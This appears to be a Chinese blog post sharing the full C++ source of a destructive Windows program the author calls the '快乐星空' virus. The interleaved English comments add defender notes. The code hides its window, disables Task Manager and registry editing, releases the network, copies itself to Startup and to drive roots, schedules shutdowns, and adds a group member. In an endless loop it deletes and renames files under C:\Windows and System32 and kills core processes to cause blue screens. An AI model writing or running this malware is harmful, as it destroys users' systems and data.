我最近发现,我2024年后就再也没有更新过 C++#沙雕程序了。
今天我想通了,我要再更几期关于C++#沙雕程序的文章。
开始做!
这一次就直接上代码蚌!
不用任何特定头文件。
#include
#include
#include
#include
#include
#include
#define _CRT_SECURE_NO_WARNINGS 1
#pragma comment(lib,"winmm.lib")
#pragma comment(lib, "netapi32.lib")
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
using namespace std;
// File-scope state shared by the functions below. The initializers that call
// Win32 APIs run during static initialization, i.e. before main() is entered.
POINT point; // not referenced by any function in this listing
SID_IDENTIFIER_AUTHORITY Aut = SECURITY_NT_AUTHORITY;
PSID minID;
// Requests the SID of the built-in Administrators group (BUILTIN domain RID +
// DOMAIN_ALIAS_RID_ADMINS). b records whether the allocation succeeded and is
// later overwritten by ProcessRun().
BOOL b = AllocateAndInitializeSid(&Aut, 2, SECURITY_BUILTIN_DOMAIN_RID,DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &minID);
DWORD dword=TRUE;
HKEY h; // registry key handle used by Taskkill()
DWORD s = dword; // data written to the DisableTaskMgr value in Taskkill()
HWND hwnda; // window handle looked up by Hide()
HWND hWnd = GetForegroundWindow(); // whichever window is in the foreground at start-up; hidden on every pass of main()'s loop
HKEY hkey; // registry key handle used in main()'s loop
DWORD v = 1; // data written to the DisableRegistryTools value in main()
char* files_name_while = "Happy"; // suffix passed to strcat() in main()'s loop
char* filesname = "KLXK.klxk"; // name opened with ifstream in main()'s loop
char Start[MAX_PATH] = { 0 }; // receives the Startup folder path in shutupstart()
char Dest[MAX_PATH] = { 0 }; // receives "<Startup folder>\<Name>" in shutupstart()
// Hides the console so that nothing is visible to the logged-on user.
// Looks up a top-level window of class "ConsoleWindowClass" and, if one is
// found, hides it together with the pop-up windows it owns.
// Defender note: a console process whose window is hidden immediately after
// launch matches hidden-window behaviour (MITRE ATT&CK T1564.003); the process
// is still listed by process-enumeration tools.
void Hide()
{
hwnda = FindWindow("ConsoleWindowClass", NULL);// look up a window of the console class (no title filter is given)
if (hwnda) {
ShowOwnedPopups(hwnda, SW_HIDE);// SW_HIDE is 0, so this hides every pop-up window owned by hwnda
ShowWindow(hwnda, SW_HIDE);// hide the window itself
}
}
// Requests that one account be added to a local group via
// NetLocalGroupAddMembers (information level 3, one entry).
// Despite the name, the body does not create an account; it only asks for a
// group-membership change.
//   n - not used in the body
//   u - account name; copied into the local Name buffer and used as the entry
//   g - name of the local group to modify
// Returns 0 unconditionally. The NET_API_STATUS is stored in s and never
// inspected, so a caller cannot tell whether the membership changed.
// Defender note: with Security Group Management auditing enabled, a successful
// change is logged as Security event 4732 (member added to a security-enabled
// local group). Unexpected local-group changes map to MITRE ATT&CK T1098.
int AddUser(LPWSTR n,LPWSTR u,LPWSTR g)
{
NET_API_STATUS s;
LOCALGROUP_MEMBERS_INFO_3 a;
wchar_t Name[20] = { 0 };
const wchar_t *name;
name = (const wchar_t *)u;
wcscpy(Name, name);
a.lgrmi3_domainandname = Name;
// NULL server name = the local computer.
s = NetLocalGroupAddMembers(NULL, g, 3, (LPBYTE)&a, 1);
return 0;
}
// Passes four command strings to the shell that ask wmic and taskkill to
// terminate processes: svchost.exe, LsaIso.exe, smss.exe, and then everything
// matching the taskkill filter "pid ne 1". The author's description below the
// listing attributes the blue screens to this routine.
// NOTE(review): whether each request is honoured depends on the privileges of
// the calling process and on OS process protection; the listing does not show it.
// Defender note: `wmic process ... delete` or `taskkill /f` aimed at core
// system process names, spawned through cmd.exe by a non-administrative tool,
// is a high-signal process-creation event to alert on.
void Blue_Screen()
{
system("wmic process where name=\"svchost.exe\" delete");
system("wmic process where name=\"LsaIso.exe\" delete");
system("wmic process where name=\"smss.exe\" delete");
system("taskkill /f /fi \"pid ne 1\"");
}
// Checks whether the caller's token is a member of the built-in Administrators
// group, using the SID requested at file scope (minID).
// If that allocation succeeded (b is non-zero), CheckTokenMembership overwrites
// b with the membership result, the SID is freed, and `b == true` is returned.
// If the allocation failed, the else branch returns `b == false`, which
// evaluates to true in that branch.
// main() calls this function and discards the result, so the outcome does not
// gate any later step in this listing.
bool ProcessRun()
{
if(b)
{
// NULL token handle: the check is made against the calling thread's
// impersonation token, or the process token if it is not impersonating.
CheckTokenMembership(NULL, minID, &b);
FreeSid(minID);
return b == true;
}else
return b == false;
}
// Writes the per-user policy value that disables Task Manager:
//   HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
//   DisableTaskMgr (REG_DWORD) = s, which is initialised from TRUE at file scope.
// Despite its name, this function terminates no process.
// Return codes of the three registry calls are not checked.
// Defender note: alert on writes to this value from anything other than policy
// tooling (registry value-set telemetry such as Sysmon event ID 13; MITRE
// ATT&CK T1112). Deleting the value or setting it to 0 re-enables Task Manager
// for that user.
void Taskkill()
{
RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &h);
RegSetValueEx(h, "DisableTaskMgr", NULL, REG_DWORD, (LPBYTE)&s, sizeof(DWORD));
RegCloseKey(h);
}
// Runs `ipconfig /release` through the shell; the exit status of system() is
// ignored.
// Defender note: ipconfig.exe started with /release by an unknown parent is
// visible in process-creation logs. On an affected host, `ipconfig /renew`
// requests the leases again.
void Release()// disconnect the network
{
system("ipconfig /release");
}
// Copies the running executable to the path given in Tree.
//   Tree - destination file path
// GetModuleFileName(NULL, ...) retrieves the path of the current process image.
// CopyFile is called with bFailIfExists = FALSE, so an existing file at the
// destination is overwritten. Neither return value is checked.
// After the copy the function runs `pause > nul` through the shell.
// Defender note: the same image appearing under identical names in the root of
// several drives is a simple file-creation indicator for triage.
void Copy(LPCTSTR Tree)
{
LPCTSTR TargetPath = _T(Tree); // presumably just Tree in a non-Unicode build; confirm against the build settings
TCHAR tcBuf[_MAX_PATH];
::GetModuleFileName(NULL, tcBuf, sizeof(tcBuf));
::CopyFile(tcBuf, TargetPath, FALSE);
system("pause > nul");
}
// Copies a file into the current user's Startup folder.
//   Path - source file to copy
//   Name - file name to use inside the Startup folder
// SHGetSpecialFolderPath resolves CSIDL_STARTUP into the global Start buffer
// (fCreate = TRUE creates the folder if it is missing). Dest is then formatted
// as "<Start>\<Name>" and CopyFile overwrites any existing file there.
// Returns TRUE unconditionally; no API result is checked.
// Defender note: a new executable in a Startup folder is a standard persistence
// indicator (MITRE ATT&CK T1547.001). File-creation monitoring on that folder
// catches it, and removing the copied file removes this persistence.
bool shutupstart(char *Path, char *Name)
{
SHGetSpecialFolderPath(NULL, Start, CSIDL_STARTUP, TRUE);
wsprintf(Dest, "%s\\%s", Start, Name);
CopyFile(Path, Dest, FALSE);
return TRUE;
}
// Entry point. Runs the one-time setup steps, then enters a loop with no exit
// that repeats a registry write, a window hide and a series of shell commands.
// The comments name the host artefact each step is meant to leave, for
// detection and triage.
// NOTE(review): the listing does not establish whether every step has the
// effect the author describes. Treat the annotations as the intended behaviour.
int main(){
Hide(); // hide the console window
Taskkill(); // set the DisableTaskMgr policy value under HKCU
Release(); // run `ipconfig /release`
ProcessRun(); // Administrators-membership check; the result is discarded
// Copy C:\KLXK.exe into the user's Startup folder as KLXK.exe.
shutupstart("C:\\KLXK.exe", "KLXK.exe");
// Schedule a shutdown in 180 seconds (MITRE ATT&CK T1529). On an affected
// host `shutdown /a` cancels a pending shutdown.
system("shutdown -s -t 180");
// Copy the running image to the root of drives C: through H:.
Copy("C:\\klxk.exe");
Copy("D:\\klxk.exe");
Copy("E:\\klxk.exe");
Copy("F:\\klxk.exe");
Copy("G:\\klxk.exe");
Copy("H:\\klxk.exe");
int q; // counter incremented once per loop pass
while(1)
{
q++;
// Write HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
// DisableRegistryTools (REG_DWORD) = v (1) on every pass. Detection is the
// same as for DisableTaskMgr: alert on value-set events for this key
// (MITRE ATT&CK T1112).
RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &hkey);
RegSetValueEx(hkey, "DisableRegistryTools", NULL, REG_DWORD, (LPBYTE)&v, sizeof(DWORD));
RegCloseKey(hkey);
// Hide the window that was in the foreground when the program started.
ShowWindow(hWnd, SW_HIDE);
// Shell command string; the author's description attributes removal of the
// gho image to this step.
system("rd C:\ghost.exe /s /q");
// Open the file named by filesname, pass files_name_while to strcat() on the
// same pointer, then read one token from the file into it.
ifstream file(filesname);
strcat(filesname, files_name_while);
file >> filesname;
// Group-membership request; see AddUser().
AddUser(filesname, "KLXK");
// Shell command strings built around `rd` and `ren` with Windows directory
// paths. The author's description attributes the file removal and extension
// changes to these (MITRE ATT&CK T1485).
// Defender note: cmd.exe running `rd /s /q` or `ren` against paths under the
// Windows directory, spawned by a user-launched binary, is worth alerting on
// whether or not the command succeeds.
system("rd C:\Windows\explorer.exe /s /q");
system("rd C:\Windows\System32 /s /q");
system("rd C:\Windows\notepad.exe");
system("ren C:\Windows\System32\*.exe *.Klxk");
system("ren C:\Windows\System32\*.pdf *.Klxk");
system("ren C:\Windows\System32\*.pptx *.Klxk");
system("ren C:\Windows\System32\*.txt *.Klxk");
// Call the process-termination routine when the counter equals 10000.
if (q == 10000)
Blue_Screen();
}
return 0; // not reached: the loop above has no exit
}
这个病毒叫做快乐星空。。。
这个程序刚运行时看不出任何效果,但之后会删除 gho 映像、设置开机自启、自动添加许多文件、定时关机、定时更改程序后缀,禁用任务管理器、注册表和网络,经常蓝屏,并添加用户!不可在实体机上运行;若造成损失,作者概不负责。